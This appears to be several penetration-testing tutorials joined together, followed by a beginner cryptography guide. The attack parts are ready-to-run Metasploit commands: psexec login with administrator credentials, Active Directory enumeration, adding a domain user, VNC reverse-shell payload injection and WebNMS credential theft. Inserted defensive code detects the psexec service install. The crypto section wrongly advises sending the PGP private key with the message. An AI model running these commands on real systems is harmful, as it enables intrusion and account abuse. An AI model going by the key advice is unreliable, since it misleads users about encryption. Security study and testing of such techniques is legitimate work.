Penetration Testing in Windows Server Active Directory using Metasploit (Part 1)

Open a Kali terminal and type: nmap -sV 192.168.0.104


You'll see that port 445 is open. Port 445 is a traditional Microsoft networking port: TCP port 445 carries Server Message Block (SMB) over TCP/IP, which is a core means of communication on a Microsoft-based LAN.


In the Kali terminal, type msfconsole.

This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. It is similar to the "psexec" utility provided by SysInternals. The module is now able to clean up after itself; the service it creates uses a randomly chosen name and description.

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set rhost 192.168.0.104
msf exploit(psexec) > set rport 445
msf exploit(psexec) > set smbuser administrator
msf exploit(psexec) > set smbpass Ignite@123
msf exploit(psexec) > exploit
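A defender-side check for the trace this module leaves on the target (the randomly named service it installs, recorded as Event ID 7045 in the Windows System log), added here as an example that is not part of the original article. The log records are constructed for the example; the name heuristics are assumptions about how such a service install looks, not Metasploit's own code.

```python
import re

# Constructed Windows System log records (Event ID 7045, "a service was installed"),
# reduced to the fields the check needs. Made up for this example, not captured data.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
    {"EventID": 7045, "ServiceName": "hWqZLkTp",            # random 8-letter name
     "ImagePath": r"%SYSTEMROOT%\hWqZLkTp.exe"},            # binary dropped via ADMIN$
    {"EventID": 7045, "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"EventID": 7045, "ServiceName": "gYtRmWxQ",
     "ImagePath": r"%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e <b64>"},
    {"EventID": 4624, "LogonType": 3, "TargetUserName": "administrator"},
]

# A randomly generated service name: 4-16 letters with upper and lower case mixed in
# no word-like pattern (an uppercase letter directly after a lowercase one).
RANDOM_NAME = re.compile(r"^(?=.*[a-z][A-Z])[A-Za-z]{4,16}$")
# Service names used by well-known remote-execution tools (SysInternals PsExec).
KNOWN_TOOL_NAMES = {"PSEXESVC"}


def service_install_findings(event):
    """Return the reasons a 7045 record looks like a remote psexec-style service install."""
    if event.get("EventID") != 7045:
        return []
    name, path = event["ServiceName"], event["ImagePath"]
    exe = path.split("\\")[-1].split(" ")[0].lower()
    reasons = []
    if RANDOM_NAME.match(name) and exe == name.lower() + ".exe":
        reasons.append("random service name that matches the dropped executable")
    if re.match(r"%(systemroot|windir)%\\[^\\]+\.exe$", path, re.I):
        reasons.append("service binary placed directly in the Windows directory (ADMIN$)")
    if re.search(r"%comspec%|\bcmd\.exe|\bpowershell\.exe", path, re.I):
        reasons.append("service runs a command interpreter instead of a service binary")
    if name.upper() in KNOWN_TOOL_NAMES:
        reasons.append("service name of a known remote-execution tool")
    return reasons


def suspicious_service_installs(events):
    """Map each flagged service name to its findings; clean records are left out."""
    return {e["ServiceName"]: r for e in events
            for r in [service_install_findings(e)] if r}


if __name__ == "__main__":
    for name, reasons in suspicious_service_installs(SAMPLE_EVENTS).items():
        print(name, "->", "; ".join(reasons))
```

Pair this with the SMB logon (Event ID 4624, logon type 3) that precedes the service install to tie the service creation back to the account used.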


Find All Active Directory Computers

This module will enumerate the computers included in the primary Domain.
msf > use post/windows/gather/enum_ad_computers
msf post(enum_ad_computers) > set filter objectCategory=computer
msf post(enum_ad_computers) > set session 1
msf post(enum_ad_computers) > exploit


Find All Shared Folders in Active Directory
This module will enumerate configured and recently used file shares.
msf > use post/windows/gather/enum_shares
msf post(enum_shares) > set session 1
msf post(enum_shares) > exploit


Gather All Groups in Active Directory

This module will enumerate Active Directory groups on the specified domain.
msf > use post/windows/gather/enum_ad_groups
msf post(enum_ad_groups) > set session 1
msf post(enum_ad_groups) > exploit


To Add Any User in Active Directory

This module adds a user to the Domain and/or to a Domain group. It checks whether sufficient privileges are present for certain actions and runs getprivs for SYSTEM. If you elevated privileges to SYSTEM, SeAssignPrimaryTokenPrivilege will not be assigned; you need to migrate to a process that is running as SYSTEM. If you don't have the privileges, this script exits.

msf > use post/windows/manage/add_user_domain
msf post(add_user_domain) > set addtodomain true
msf post(add_user_domain) > set username hacker
msf post(add_user_domain) > set password abcd@123
msf post(add_user_domain) > set session 1
msf post(add_user_domain) > exploit



To Delete Any User from Active Directory

This module deletes a local user account from the specified server, or the local machine if no server is given.

msf > use post/windows/manage/delete_user
msf post(delete_user) > set username hacker
msf post(delete_user) > set session 1
msf post(delete_user) > exploit


Capture VNC Session of Remote Windows PC by Payloads Injection

This article covers a post-exploitation method. To run the following commands successfully, first obtain a Meterpreter session and then follow the commands.

In this digital era, more and more people are becoming aware of security, and companies take responsibility for increasing theirs. Hence, technology is being upgraded every single second, and it is becoming more difficult to hack modern technology. But where there is a will, there is a way.

We all know that every problem comes with a solution, and so does our following problem:

While taking control of the victim's PC, some of our commands, such as run vnc, often do not work because of security measures, and we may come across an error like this:


In such a case, there is a special payload specifically for VNC. Whenever you face this problem, use the following module:

msf > use post/windows/manage/payload_inject
msf post(payload_inject) > set payload windows/vncinject/reverse_tcp
msf post(payload_inject) > set lhost 192.168.0.18
msf post(payload_inject) > set session 1
msf post(payload_inject) > exploit


After executing you can see the following result:

Gather Credential of WebNMS Framework Server using Metasploit


Exploit Targets
WebNMS Framework Server 5.2

Requirement
Attacker: kali Linux
Victim PC: WebNMS Framework Server 5.2


Open a Kali terminal and type msfconsole.


msf > use auxiliary/admin/http/webnms_cred_disclosure
msf auxiliary(webnms_cred_disclosure) > set rhost 192.168.0.103 (IP of Remote Host)
msf auxiliary(webnms_cred_disclosure) > exploit


Beginner Guide of Cryptography (Part 1)

Cryptography is the conversion of plain readable text into an unreadable form. In cryptography, the data is first converted into cipher text (encryption) and then the cipher text is converted back into readable form (decryption). Cryptography basically works on the concepts of encryption and decryption. Encryption and decryption should not be confused with encoding and decoding, in which data is converted from one form to another but is not deliberately altered so as to conceal its content. Encryption is achieved through algorithms; these algorithms work with logic, mathematical calculations and their complexity.
Encryption: Encrypted data is referred to as cipher text. Cipher text is the conversion of readable text into an unreadable form. It is the most effective way to achieve data security. To read an encrypted file, you must have access to a secret key or password that enables you to decrypt it.
Decryption: Decryption is the process of converting encrypted data back into its original form so it can be understood. To decrypt the data, one needs the secret key or password.
Encryption can be done in three ways:

1. Symmetric
2. Asymmetric
3. Hash

Symmetric: Symmetric encryption's job is to take readable data, scramble it to make it unreadable, then unscramble it again when it's needed. It's generally fast, and there are lots of good encryption methods to choose from. The most important thing to remember about symmetric encryption is that both sides, the encrypter and the decrypter, need access to the same key.

Asymmetric: Asymmetric encryption also takes readable data, scrambles it, and unscrambles it again at the other end, but there's a twist: a different key is used for each end. Encrypters use a public key to scramble the data, and decrypters use the matching private (secret) key on the other end to unscramble it again.

Hash: Hashing is what is actually happening when you hear about passwords being "encrypted". Strictly speaking, hashing is not a form of encryption, though it does use cryptography. Hashing takes data and creates a hash out of it, a string of data with three important properties: the same data will always produce the same hash; it is impossible to reverse it back to the original data given knowledge of only the hash; and it is infeasible to create another string of data that will produce the same hash (called a "collision" in crypto parlance). Another use of a hash is to authenticate otherwise clearly-transmitted data using a shared secret (effectively, a key). The hash is generated from the data and this secret, so that only the data and the hash are visible; the shared secret is not transmitted, and it thus becomes infeasible to modify either the data or the hash without the modification being detected.
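The hash properties and the shared-secret authentication just described, shown with Python's standard library as an added example that is not part of the original article. The secret, message and password are constructed values; the password-storage part (a salted, slow hash) goes a step beyond the text to show what "encrypted" passwords actually are.

```python
import hashlib
import hmac
import secrets


def sha256_hex(data: bytes) -> str:
    """Plain hash: same input gives the same digest; any change gives an unrelated one."""
    return hashlib.sha256(data).hexdigest()


def hash_password(password: str, salt: bytes = b"") -> tuple:
    """Password storage is a salted, deliberately slow hash (PBKDF2-HMAC-SHA256), not encryption."""
    salt = salt or secrets.token_bytes(16)   # fresh random salt for each stored password
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)


def check_password(password: str, salt: bytes, stored: bytes) -> bool:
    return hmac.compare_digest(hash_password(password, salt)[1], stored)


def make_tag(secret: bytes, message: bytes) -> str:
    """HMAC-SHA256: the tag depends on the message and the shared secret.
    Only (message, tag) travels; the secret itself is never transmitted."""
    return hmac.new(secret, message, hashlib.sha256).hexdigest()


def verify_tag(secret: bytes, message: bytes, tag: str) -> bool:
    # compare_digest takes the same time whether or not the tags match
    return hmac.compare_digest(make_tag(secret, message), tag)


def demo() -> dict:
    secret = b"constructed-shared-secret"     # constructed value for the example
    msg = b"transfer 100 to account 42"
    wire = (msg, make_tag(secret, msg))       # what an observer on the path sees
    salt, stored = hash_password("constructed-pass")
    return {
        "same_data_same_hash": sha256_hex(msg) == sha256_hex(msg),
        "one_char_changes_hash": sha256_hex(msg) != sha256_hex(b"transfer 101 to account 42"),
        "tag_verifies": verify_tag(secret, *wire),
        "tampered_message_detected": not verify_tag(secret, b"transfer 900 to account 42", wire[1]),
        "forged_tag_detected": not verify_tag(secret, msg, make_tag(b"wrong-secret", msg)),
        "password_check": check_password("constructed-pass", salt, stored),
        "wrong_password_rejected": not check_password("Constructed-pass", salt, stored),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {ok}")
```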
Now, there are very simple methods to achieve cryptography in our day to day life so that our data sharing can be done securely.


For symmetric encryption we can simply visit the website www.aesencryption.net, shown below:


On this website, write your message in the first box, enter your password in the second box, and then click on the Encrypt button on the right side.


The website will now reload and provide you with the encrypted text. Send this encrypted text to the desired person and tell them the key (which, in this case, is time).

The said person, after receiving your encrypted message, can come to this website to decrypt it. He/She will simply have to copy the encrypted text and paste it in the first box, enter the key in the next box and click on the Decrypt button on the right side, as shown below:


After clicking on Decrypt, the site will reload and provide you with the plain text.


Hence, symmetric encryption.
For asymmetric encryption, we can simply go to www.igolder.com/pgp/generate-key/ and the following website will open:


Click on generate PGP keys, after opening the website. A public and private key will be generated.


Now, copy the public key and click on the PGP Encrypt Message option; it will redirect to the following page:


Paste the public key in the first box and write your message in the second box. By clicking on Encrypt Message, you will get your message encrypted.


Now, send this encrypted message to the desired person along with the private key which you generated in the first step. The same person can then visit this site and click on the PGP Decrypt Message option to decrypt the message. After clicking on the said option, the following page will open:


He/She can copy the private key and the encrypted message and paste them in the first and second box respectively.


At last, click on Decrypt Message and your message will be decrypted.